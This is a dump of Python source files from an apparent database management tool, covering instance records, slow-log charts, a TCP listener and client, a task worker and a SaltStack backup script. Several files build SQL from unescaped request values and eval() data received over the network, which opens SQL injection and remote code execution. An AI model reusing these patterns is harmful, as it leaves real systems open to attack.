self.inst_level=DEFAULT_LEVEL\n if not self.inst_name:\n self.inst_name=self.inst_ip\n if not self.inst_owner:\n self.inst_owner=DEFAULT_OWNER\n if not self.inst_online_date:\n self.inst_online_date=datetime.datetime.now()\n if not self.inst_dbtype:\n self.inst_dbtype=DEFAULT_DBTYPE\n if not self.inst_hatype:\n self.inst_hatype=DEFAULT_HATYPE\n if not self.inst_business:\n self.inst_business=DEFAULT_BUSINESS\n \n return True\n \n def add_instance(self):\n '''\n save new instance\n \n '''\n server_id=1\n if not self.data_check():\n return False,self.msg\n is_exist=InstanceGet().get_instance_by_ip_port(self.inst_ip, self.inst_port)\n if is_exist:\n self.msg+=MSG_ERR_INSTANCE_EXITST\n return False,self.msg\n \n is_server_exist=ServerGet().get_server_by_ip(self.inst_ip)\n if not is_server_exist:\n s,msg=ServerManage({'server_ip':self.inst_ip}).add_server() \n\n server=ServerGet().get_server_by_ip(self.inst_ip)[0] \n if server:\n server_id=server[\"id\"]\n #is_owner_exist=\n #is_business_exist= \n inst=Instance(server_id=server_id,ip=self.inst_ip,port=self.inst_port,level=self.inst_level,name=self.inst_name,business_id=self.inst_business,\n online_date=self.inst_online_date,owner=self.inst_owner,db_type=self.inst_dbtype,ha_type=self.inst_hatype)\n\n if self.inst_role==2 or self.inst_role == '2':\n inst.master_id=self.inst_master\n inst.save()\n return True,self.msg\n \n def mod_instance(self):\n if not self.inst_id:\n self.inst_id=InstanceGet().get_instance_by_ip_port(self.inst_ip, self.inst_port)\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id) \n #inst.ip=self.inst_ip\n #inst.port=self.inst_port\n if self.inst_business:\n inst.business_id=self.inst_business\n if self.inst_level: \n inst.level=self.inst_level\n if self.inst_name: \n inst.name=self.inst_name \n if self.inst_dbtype: \n inst.db_type=self.inst_dbtype\n if self.inst_hatype:\n inst.ha_type=self.inst_hatype\n if self.inst_online_date:\n inst.online_date=self.inst_online_date\n if self.inst_owner:\n inst.owner=self.inst_owner\n if self.inst_version:\n inst.version=self.inst_version\n if self.inst_role:\n inst.role=self.inst_role\n if self.inst_role==2 or self.inst_role == '2':\n if self.inst_master:\n inst.master_id=self.inst_master\n else:\n inst.master_id=0\n inst.save()\n return True,self.msg\n \n def 
stat_instance(self,action=False):\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id)\n if action:\n inst.stat=STAT_OFFLINE\n else:\n if inst.stat==STAT_ONLINE:\n inst.stat=STAT_OFFLINE\n else:\n inst.stat=STAT_ONLINE\n inst.save()\n return True,self.msg\n def stat_instance_slowlog(self):\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id)\n if inst.slowlog == 1:\n inst.slowlog =0\n else:\n inst.slowlog=1\n inst.save()\n return True,self.msg\n \nclass InstanceGet():\n '''\n all the instance info query\n '''\n def __init__(self):\n self.inst=Instance\n self.q=PyMySQL()\n \n def get_instance(self,instance):\n inst_id=instance.get(\"instance_id\")\n result=self.get_instance_by_id(inst_id)\n business=Business.objects.filter(id=result['business_id']).values('name')[0]\n owner=User.objects.filter(id=result['owner']).values('name')[0]\n if result['master_id']:\n master=self.get_instance_by_id(result['master_id'])\n if master:\n result['master_ip']=master['ip']\n result['master_port']=master['port'] \n result[\"business\"]=business['name']\n result[\"owner_name\"]=owner['name']\n return result\n \n def get_instance_base(self,instance_id):\n '''\n get the basic info beyond the columns of instance\n uptime\n socket\n '''\n uptime=get_instance_newest_stat(instance_id,'uptime')\n uptime=str(datetime.timedelta(seconds=uptime))\n socket=get_instance_newest_variable(instance_id,'socket') \n return {'uptime':uptime,'socket':socket}\n \n def get_instance_by_id(self,inst_id=0):\n if inst_id:\n result=self.inst.objects.filter(id=inst_id).values()[0]\n else:\n result=self.inst.objects.all()[0:1].values()[0]\n return result\n \n def get_instance_by_ip(self,inst_ip=''):\n if not inst_ip:\n return\n result=self.inst.objects.filter(ip=inst_ip).values()\n return result\n def get_instance_by_ip_port(self,ip,port=DEFAULT_DB_PORT):\n result=0\n result=self.inst.objects.filter(ip=ip,port=port).values(\"id\")\n return result\n def get_instance_list(self,str_filter,count=10,offset=0):\n result=None\n if not str_filter:\n str_filter=''\n sql=\"select i.* ,i.business_id,b.name as business,i.owner as owner_id,u.name as owner from instance i \\\n left join business b on i.business_id=b.id left join user u on i.owner=u.id where 1=1 \"\n if len(str_filter):\n for f in str_filter:\n if len(str(str_filter[f])) <>0:\n sql+=\" and %s='%s'\" % (f,str_filter[f])\n sql+=\" order by i.stat desc,i.ip,i.port \"\n if count==0:\n result=self.inst.objects.raw(sql)\n else:\n result=self.inst.objects.raw(sql)[offset:count]\n return result \n \n def get_instance_slaves(self,instance_id):\n if not instance_id:\n return None \n result=self.inst.objects.filter(master_id=instance_id).values()\n return result\n " }, { "alpha_fraction": 0.6148648858070374, "alphanum_fraction": 0.625, "avg_line_length": 19.413793563842773, "blob_id": "f4fa036dcc1e7cfd95a3bcc6382444950780359a", "content_id": "fb25306e8c83bba015300a208bfebd8799177137", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/src/mega_client/mega-1.0/mega_client/ping.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 6, 2014\n\n@author: xchliu\n\n@module:mega_client.mega_client.script.ping\n'''\n\nfrom sender import MegaClient\nfrom utils import get_ip_address\nfrom setting 
import version,MEGA_HOST\n\ndef main():\n '''\n keepalived check between mega service and client\n ''' \n myname,myip=get_ip_address()\n \n cmd='client_ping'\n c=MegaClient(host=MEGA_HOST,cmd=cmd)\n result=c.run(func_args=\"'%s',version='%s'\" %(myip,version),TOOL=True)\n if result:\n return 'success'\n else:\n return 'failed'\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5724999904632568, "alphanum_fraction": 0.5975000262260437, "avg_line_length": 16.434782028198242, "blob_id": "47131047d44c57217b5f3d035ea939c2a10222d4", "content_id": "d08a0e1ab5faa5b3c227c4549150acb7fe09acac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 400, "license_type": "no_license", "max_line_length": 54, "num_lines": 23, "path": "/src/apis/report.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:apis.report\n'''\n\nimport datetime\nfrom mega_service.report import daily \n\ndef report_routine(time=None):\n #daily\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n if int(time.split(':')[0]) == 10 :\n daily.backup_report_daily()\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4872744083404541, "alphanum_fraction": 0.5224432945251465, "avg_line_length": 27.559999465942383, "blob_id": "82efdc34d75404c4a6d8d802811a2760cc9e571a", "content_id": "f3dbda5db34424fdd513db6bc781de31b7d8e71b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2201, "license_type": "no_license", "max_line_length": 91, "num_lines": 75, "path": "/src/scripts/mega_salt.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# coding: utf-8\n#Created on 2014-06-12\n#@author: gxg\n#Usage:mega_salt use for doing db backup by mega calling \n\nimport sys\nsys.path.append('/export/servers/script/mega-master/src/mega_service/')\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport salt.client\nimport json, traceback\nimport time\nimport os\nimport commands\nimport ast\nimport getpass\n\ndef saltcmdrun(ip,command,args):\n '''\n command 是命令脚本,调用远程服务器脚本(带绝对路径)\n '''\n #ip = ['172.17.62.43','172.17.62.42']\n client = salt.client.LocalClient()\n #res = client.cmd(ip, 'cmd.run',[command],timeout=86400,expr_form='list')\n #res = client.cmd(ip, 'cmd.script',[command],kwarg=args,timeout=86400,expr_form='list')\n res = client.cmd_async(ip, 'cmd.script',[command],timeout=86400,expr_form='list')\n return res\n\ndef backup_salt_client(args):\n ''''''\n feadback = {}\n ip_list = [ip[\"host_ip\"] for ip in args]\n for ips in ip_list:\n result = saltcmdrun(ips,'salt:\\\\mega_db_backup.py',args)\n feadback[ips] = result\n return feadback\n\n\nif __name__ == \"__main__\":\n#*# if len(sys.argv) !=1:\n#*# print \"USAGE:\\n\", USAGE.strip(\"\\n\")\n#*# sys.exit(0)\n#*# args = sys.argv\n args =[ {'id' : 1,\n 'host_ip' : '172.17.62.37',\n 'port' : 3309,\n 'db_type' : 'mysql',\n 'backup_tool' : 'xtrabackup',\n 'backup_level': 'instance',\n 'level_value' : '',\n 'backup_type' : 'full',\n 'need_data' : 'Y',\n 'need_schema' : 'Y',\n 'Iscompressed': 'Y',\n 'isEncrypted' : 'Y',\n 'retention' : '7',\n },\n {'id' : 1,\n 'host_ip' : '172.17.62.38',\n 'port' : 3309,\n 'db_type' : 'mysql',\n 'backup_tool' : 'xtrabackup',\n 'backup_level': 'instance',\n 'level_value' : '',\n 'backup_type' : 'full',\n 'need_data' : 'Y',\n 'need_schema' : 'Y',\n 'Iscompressed': 'Y',\n 'isEncrypted' 
: 'Y',\n 'retention' : '7',\n }\n ]\n res = backup_salt_client(args)\n print json.dumps(res, indent = 4, sort_keys=True)\n \n" }, { "alpha_fraction": 0.6502732038497925, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 21.875, "blob_id": "97476a1eb0e82824c67688aabefa59b68abf5eb1", "content_id": "63b247ca8dab7120f8422d2d09cc2ad3256dbe92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/src/tests/test.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import os,sys\nd=os.path.dirname(sys.path[0])\nt=os.path.basename(sys.path[0])\na=os.path.abspath(sys.path[0])\nprint a\nos.chdir('/'.join((d,t)))\n#for l in open('slow_log.py'):\n#\tprint l\n" }, { "alpha_fraction": 0.8217270374298096, "alphanum_fraction": 0.8217270374298096, "avg_line_length": 39, "blob_id": "48b65374a49b93978b332a95fb216fb7ebcd9157", "content_id": "30f7aac1cfc6d0342509c6dd3c85070ee0a84a91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/src/apis/api.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from resource import * \nfrom manage import *\nfrom task import * \nfrom tools import * \nfrom report import *\nfrom mega_web.console.failover import FailoverManage\nadd_failover_record=FailoverManage(None).add_failover_record\nadd_failover_record_detail=FailoverManage(None).add_failover_record_detail\nstat_failover_record=FailoverManage(None).stat_failover_record" }, { "alpha_fraction": 0.6274446845054626, "alphanum_fraction": 0.6327348351478577, "avg_line_length": 37.51234436035156, "blob_id": "5034ede154aa3e665a162fc614ab64cecb206c45", "content_id": "ee856ecd023c0dbeeef852b7c18bfd3faa899375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6238, "license_type": "no_license", "max_line_length": 186, "num_lines": 162, "path": "/src/mega_web/tunning/slowlog.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 19, 2014\n\n@author: xchliu\n\n@module:mega_web.tunning.slowlog\n'''\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.charts.chart import Chart\nfrom lib.utils import today\n\n\ncursor=PyMySQL()\n \n\ndef get_chart_groupbyinstance(begin=None,end=None):\n #default recent 7 days\n if not begin or not end:\n begin=today(7)\n end=today()\n sql=''' select concat(ip,':',port),sum(counts) as counts from slowlog_time_day a,instance b where a.instance_id=b.id and \n date(log_time) between '%s' and '%s' group by instance_id order by counts desc limit 10;''' % (begin,end)\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, 'slow log by instance') \n\ndef get_chart_total(instance_id=None,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n if instance_id:\n sql=\"select day(log_time) as day,sum(counts) as counts from slowlog_time_day where instance_id=%s and date(log_time) between '%s' and '%s' \\\n group by date(log_time);\" % (instance_id,begin,end) \n else:\n sql=\"select day(log_time) as day,sum(counts) as counts from slowlog_time_day where date(log_time) between '%s' and '%s' \\\n group by date(log_time);\" % (begin,end)\n cursor=PyMySQL().query(sql)\n 
data=cursor.fetchall()\n c=Chart()\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, '')\n\ndef get_chart_groupbytime(begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n \n sql='''select date(log_time) as day,sum(lt_one) as lt_one,sum(lt_five) as lt_five,sum(lt_ten) as lt_ten,sum(lt_hundred) as \\\n lt_hundred,sum(gt_hundred) as gt_hundred from slowlog_time_day\n where date(log_time) between '%s' and '%s' group by hour(log_time);''' % (begin,end)\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='pie'\n c.yaxis_name='counts'\n c.data_list=[\"<1s\",\"<5s\",\"<10s\",\"<100s\",\">100s\"]\n return c.generate(data, 'slow log by time') \n\ndef get_chart_topsql(begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today() \n sql=\"select b.hash_code,b.sql_parsed,sum(counts) as counts,max_time,min_time,avg(avg_time) as avg_time,max_row,min_row,avg(avg_row) as avg_row from slowlog_sql_hour a ,sql_format b \\\n where a.hash_code=b.hash_code and date(log_time) between '%s' and '%s' group by a.hash_code order by counts desc limit 100 ;\" % (begin,end)\n \n data=cursor.query(sql,type='dict').fetchall()\n for d in data:\n d['sql_parsed']=d['sql_parsed'].decode('utf-8', 'ignore')\n opt_count=0\n sql=\"select count(*) from slowlog_opt where hash_code='%s'\" % d.get('hash_code')\n opt_count=cursor.fetchOne(sql)\n if opt_count:\n d['opt_count']=opt_count\n return data\n\ndef get_instance_topsql(instance_id,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n \n sql=\"select a.hash_code,b.sql_parsed,count(*) as counts,max(query_time) as max_time,min(query_time) as min_time,avg(query_time) as avg_time,\\\n max(rows_examined) as max_row,min(rows_examined) as min_row,avg(rows_examined) as avg_row from slowlog_info a ,sql_format b where instance_id=%s \\\n and a.hash_code=b.hash_code and date(from_unixtime(a.start_time)) between '%s' and '%s' group by a.hash_code order by counts desc;\" %(instance_id,begin,end)\n print sql\n data=cursor.query(sql,type='dict').fetchall()\n for d in data:\n d['sql_parsed']=d['sql_parsed'].decode('utf-8', 'ignore')\n return data\n\n\ndef get_sql_hosts(hash_code):\n sql=\"select concat(user,'@',user_host) as users,count(*) as counts from slowlog_info where hash_code='%s' group by user,user_host order by counts desc;\" % hash_code\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, ' by instance') \n\ndef get_sql_time(hash_code):\n sql=\"select date(log_time) as log_time,count(*) as counts from slowlog_sql_hour where hash_code='%s' group by date(log_time) order by date(log_time);\" % hash_code\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, '')\n\ndef get_sql_info(hash_code):\n sql=\"select hash_code,db_host,port,dbname,sql_text,sql_explained from slowlog_info where hash_code='%s' limit 1\" %hash_code\n data=cursor.query(sql,type='dict').fetchone()\n return data\n\ndef add_opt_record(request):\n hash_code=request.get('hash_code')\n opt_method=request.get('opt_method')\n opt_explain=request.get('opt_explain')\n if not hash_code:\n return 'Get sql hash code failed!' 
\n if not opt_method:\n return 'Invalid optimize method'\n sql=\"insert into slowlog_opt(hash_code,opt_method,opt_explain,opt_time) values('%s','%s','%s',now())\" %(hash_code,opt_method,opt_explain)\n result,ex=cursor.execute(sql)\n if not result:\n result=ex\n else:\n result='Success '\n return result\n\ndef get_opt_record(hash_code):\n if not hash_code:\n return \n sql=\"select * from slowlog_opt where hash_code='%s'\" % hash_code\n data=cursor.query(sql,type='dict').fetchall()\n return data\n\ndef get_chart_groupbydb(instance_id=None,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n if instance_id:\n sql='''select db,sum(counts) as counts from slowlog_time_day where instance_id=%s and date(log_time) between '%s' and '%s' group by db order by counts desc ;\n ''' % (instance_id,begin,end)\n else:\n sql='''select db,sum(counts) as counts from slowlog_time_day where date(log_time) between '%s' and '%s' group by db order by counts desc ;\n ''' % (begin,end)\n \n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\"]\n return c.generate(data, 'by db') \n\n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5668147206306458, "alphanum_fraction": 0.5728704333305359, "avg_line_length": 25.645160675048828, "blob_id": "b1b195ed1af6d7e31dae8ced2a957940d7a571c1", "content_id": "3d22b589e05a34697cab40c79795195006891ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2477, "license_type": "no_license", "max_line_length": 70, "num_lines": 93, "path": "/src/mega_client/mega-1.0/mega_client/listener.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport time\nimport sys\nimport SocketServer\nimport signal\nfrom SocketServer import StreamRequestHandler as SRH\nfrom setting import TCP_HOST,TCP_PORT\nfrom logs import Logger\nfrom worker import Worker\n\nEND_SIGN='eof'.upper()\nERROR='-1'\nSUCCESS='0'\nTCP_HEADER=['HEAD','MEGA']\nBUFFER_SIZE=10\nHEADER_LENGTH=10\n\nMODEL='Listener'\nlog = Logger(MODEL).log()\n \nSocketServer.ThreadingTCPServer.allow_reuse_address = True\n\nclass Servers(SRH):\n \n def handle(self):\n log.debug('Get connection from %s' % str(self.client_address))\n global q\n result=''\n data=''\n header=''\n header=int(self.request.recv(HEADER_LENGTH))\n while header>0:\n _d= self.request.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-BUFFER_SIZE\n# print header,_d\n data=data.replace(END_SIGN, '')\n log.debug(data)\n if self.data_check(data):\n _w=Worker(data).run()\n result=str(_w)\n else:\n result=ERROR\n#todo : \n# get the len(result),add the length to the head of packget, \n# chancel the end sign\n _len=len(result)+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.request.sendall(_header+result+END_SIGN)\n self.request.close()\n \n def data_check(self,data):\n if len(data) == 0:\n return False\n try:\n if eval(data).get(TCP_HEADER[0]).upper() != TCP_HEADER[1]:\n return False\n except:\n return False\n \n return True\n \ndef tcp_server(host=TCP_HOST,port=TCP_PORT):\n \n def sign_killed(signum,frame):\n server.server_close()\n log.info(\"TCP server quiting...\")\n sys.exit(0)\n\n addr = (host,port)\n log.info('TCP Server listen on %s ...' 
% str(addr))\n server=None\n signal.signal(signal.SIGINT, sign_killed)\n signal.signal(signal.SIGTERM, sign_killed)\n try:\n server = SocketServer.ThreadingTCPServer(addr,Servers)\n server.daemon_threads=True\n server.serve_forever()\n \n except Exception as ex:\n log.error('TCP server start failed as: %s',ex)\n sys.exit(1)\n finally:\n if server:\n server.shutdown()\n server.server_close()\n \nif __name__==\"__main__\":\n tcp_server()" }, { "alpha_fraction": 0.6356589198112488, "alphanum_fraction": 0.6385148763656616, "avg_line_length": 30.84415626525879, "blob_id": "f0a34f566632464d20227d67d4b8c704ee65739c", "content_id": "1d2d40848f7892c42086020d6855d4e335f1dcd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2451, "license_type": "no_license", "max_line_length": 132, "num_lines": 77, "path": "/src/mega_web/admin/views.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 7, 2014\n\n@author: xchliu\n\n@module:mega_web.admin.views\n'''\nfrom django.contrib import auth\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response,RequestContext\n\nfrom client_manage import ClientGet\nfrom mega_web.lib import paginator\nfrom mega_service.mega import client_update\n\n@login_required\ndef mega_admin(request):\n if request.method==\"GET\":\n return render_to_response('admin_mega/admin.html',context_instance=RequestContext(request))\n else:\n return render_to_response('admin_mega/admin.html',context_instance=RequestContext(request))\n \ndef client(request):\n _msg=''\n client_list=ClientGet().get_client_list()\n if request.method==\"GET\":\n page=request.GET.get('page')\n action = request.GET.get('action')\n host=request.GET.get('ip')\n if action == 'client_upgrade' and host:\n result=client_update(host)\n if result:\n _msg='success'\n else:\n _msg='failure'\n else:\n page=request.POST.get('page')\n if not page:\n page=1\n page_data=paginator.paginator(client_list, page)\n page_range=page_data.get('page_range')\n client_list=page_data.get('page_data')\n count=ClientGet().get_client_statics()\n return render_to_response('admin_mega/client.html',{'client_list':client_list,'page_range':page_range,'count':count,'msg':_msg},\n context_instance=RequestContext(request))\n\ndef login(request):\n next='/login/'\n if request.method == 'GET':\n next = request.GET.get('next','')\n return render_to_response('admin_mega/login.html',{'next':next},RequestContext(request))\n else:\n \n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n next = request.POST.get('next','')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n if not next:\n next='/'\n return HttpResponseRedirect(next) \n\n#@login_required\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/\") \n# return render_to_response('home.html', RequestContext(request))\n\n\ndef main():\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4516821801662445, "alphanum_fraction": 0.45991408824920654, "avg_line_length": 30.016666412353516, "blob_id": "379e2912c1cd0732476044585a80170823159bfd", "content_id": "4b8a8822cdf207cc2adddde65e36c7f3844f56e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5588, "license_type": 
"no_license", "max_line_length": 129, "num_lines": 180, "path": "/src/mega_service/worker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nimport types\nimport inspect\nimport multiprocessing\nfrom lib.logs import Logger\nfrom apis import api as apis\n\nMODEL='Worker'\nlog = Logger(MODEL).log()\nPOOL_SIZE=5\n\n\n#===============================================================================\n# _get_func_list\n#===============================================================================\ndef _get_func_list(object):\n _funcs=[]\n if not object:\n return _funcs \n for o in dir(object):\n obj_func=getattr(object,o,None)\n if inspect.isfunction(obj_func):\n _funcs.append({\"name\":\"%s\" % obj_func.__name__,\"args\":\"%s\" % str(inspect.getargspec(obj_func))}) \n return _funcs \n\nclass Worker():\n '''\n 1.Try to get the taks in the quene \n 2.create a sub process to do the work if any task been found \n '''\n def __init__(self,queue):\n self.queue=queue \n \n def worker(self):\n pool= multiprocessing.Pool(POOL_SIZE)\n while 1:\n data=None \n try:\n # log.debug('loop')\n if not self.queue.empty():\n data=self.queue.get()\n if data:\n log.debug(data)\n pool.apply_async(work_deliver,args=(data,))\n time.sleep(1)\n except Exception as ex:\n log.error(ex)\n \n\nclass SubWorker(): \n def __init__(self):\n pass\n \n def work_resolve(self,data):\n '''\n work instance:{'HEAD':'MEGA','TYPE':'CMD','VALUE':'ls'}\n keys:\n * HEAD: for safe interactive,should be MEGA\n * TYPE: 0 internal server task,1 remote task\n * VALUE: what to do : ls\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database.\n TOOL: Internal func calls\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n \n '''\n if len(data)==0:\n return False\n d=None\n try :\n if type(data) == types.DictionaryType:\n d=data\n else:\n d=eval(data) \n if type(d)== types.DictionaryType:\n if not (d.has_key('TYPE') or d.has_key('VALUE')):\n return False\n else:\n for _d in d:\n if type(d[_d]) == types.StringType:\n d[_d].replace('\\n','')\n ' '.join(d[_d].split())\n else:\n return False\n except Exception as ex:\n log.error(\"Resolve the data failed as : %s\" % ex)\n log.error(data)\n return False\n \n return d\n \ndef work_deliver(data):\n '''\n 1.run the command\n 2.save task into db\n '''\n task=SubWorker().work_resolve(data)\n if not task:\n log.error(\"Task resovle failed!\")\n return False\n #internal funcs invoke,the task should include key : TOOL True\n if task.has_key('TOOL'):\n if task.get('VALUE')=='get_all_funcs':\n return _get_func_list(apis)\n\n #real time job \n if task.get('TIME') == 0 :\n #execute on mega server or the remote instance\n if task.get('TYPE')==0:\n result=Executor_Local(task.get('VALUE')).do_cmd(task.get('ARGS'))\n else:\n result=Executor_remote(task).run()\n else:\n #save into db\n result=1\n return result\n \n \nclass Executor_remote():\n '''\n Run the task on the remote server using the mega client tcp service\n {'NAME': u'test', 'TASK_ID': 9L, 'SCRIPT': u'test.sh', 'ARGS': \"'17:24'\", 'VALUE': u'',\n 'TIME': 0, 'CYCLE': 120L, 'TYPE': 1L, 'LAST_TIME': u'2014-08-04 17:22:19', 'TARGET': u''}\n \n '''\n def __init__(self,task):\n self.task=task\n def run(self):\n hosts=self.task.get('TARGET')\n if not hosts:\n hosts=['localhost']\n cmd=self.task.get('SCRIPT')\n _cmd=cmd.split('.')\n if len(_cmd)>1:\n if _cmd[1]=='py':\n cmd_type='python'\n elif _cmd[1] == 'sh' :\n cmd_type='bash'\n 
elif _cmd[1] == 'pl':\n cmd_type='perl'\n else:\n cmd_type='cmd'\n args=self.task.get('ARGS')\n task_id=self.task.get('TASK_ID')\n if not task_id:\n task_id=None\n for ip in hosts:\n log.info('Call remote task @ %s : %s %s' % (ip,cmd,args)) \n apis.remote_cmd(ip,1105, cmd, cmd_type, task_id,args)\n \n\n \nclass Executor_Local():\n '''\n request of mega server ,invoke func inside mega server\n '''\n def __init__(self,cmd):\n self.cmd=cmd\n def do_cmd(self,_args=None):\n func=getattr(apis,self.cmd,None)\n if func:\n log.debug(\"Call API: apis.%s(%s)\" % (self.cmd,_args))\n# return func(arg for arg in _args)\n return eval(\"apis.%s(%s)\" % (self.cmd,_args))\n \n else:\n log.error(\"Function %s not found\" % self.cmd)\n return False\n\n\nclass Saver():\n '''\n save task into database if it need to be rerun \n '''\n def __init__(self):\n pass\n def run(self):\n log.debug('saver')\n pass\n \n" }, { "alpha_fraction": 0.46568727493286133, "alphanum_fraction": 0.4739384055137634, "avg_line_length": 26.915729522705078, "blob_id": "b501102c01b216c4b992719e0864f064f742a2e6", "content_id": "4761ab849cf9aee42c9bbb549ebfb477d06b0db5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4969, "license_type": "no_license", "max_line_length": 88, "num_lines": 178, "path": "/src/mega_client/mega_client/sender.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n\n'''\n\nimport types\nimport socket\n\n\n\nTCP_HEADER={'HEAD':'MEGA'}\nEND_SIGN='eof'.upper()\nBUFFER_SIZE=10\nDEFAULT_NONE=0\nHEADER_LENGTH=10\n\n\nclass MegaClient():\n '''\n Client for mega servcie .\n return a list d:\n * if all runs success ,the list contain all the data required\n * else only a 0 in the list means something goes into failure\n code example: \n cmd='get_all_instance'\n c=MegaClient(cmd=cmd)\n if c:\n data=c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n c.close()\n return data\n '''\n HOST='localhost'\n PORT=1104\n def __init__(self,host=HOST,port=PORT,cmd=''):\n self._cmd={}\n self.host=host\n self.port=port\n socket.setdefaulttimeout(10)\n if cmd:\n self._cmd['VALUE']=str(cmd)\n \n def run(self,func_args=None,**args):\n if not self._cmd:\n return False\n _d=[]\n if self.conn():\n if func_args:\n self._cmd['ARGS']=str(func_args)\n if len(args)>0:\n self._cmd=dict(self._cmd,**args) \n _d.append(1)\n _d.append(self.cmd_run(self._cmd))\n else:\n _d.append(0)\n if _d[0] == 1:\n return _d[1]\n else:\n return _d[0]\n \n def conn(self):\n try: \n self.s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n self.s.connect((self.host,self.port))\n return True\n except Exception as ex:\n# log.error(\"Connect to host : %s failed! 
%s\" % (self.host,ex))\n return False\n \n def cmd_run(self,cmd=None):\n if not cmd:\n return False\n data=''\n _header=''\n try:\n cmd_with_pack=self._cmd_pack(cmd)\n if cmd_with_pack:\n _len=len(str(cmd_with_pack))+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.s.sendall(_header+str(cmd_with_pack)+END_SIGN)\n header=int(self.s.recv(HEADER_LENGTH))\n while header>0:\n _d=self.s.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-HEADER_LENGTH\n return self._data_unpack(data)\n except Exception as ex:\n# log.error(ex)\n return ''\n \n def _cmd_pack(self,data):\n '''\n keys:\n * TYPE: 0 internal server task,1 remote task\n * VALUE: func name which be called\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database. \n unique command type when in the case used for remote command etc.\n *cmd\n *python\n *bash\n ARGS: args for the api func\n TOOL: Internal func calls\n '''\n _d=None\n if type(data) == types.DictionaryType:\n _d=dict(TCP_HEADER,**data)\n elif type(data) == types.StringType:\n _d=dict(TCP_HEADER,**eval(data))\n else:\n _d={}\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n for _i in 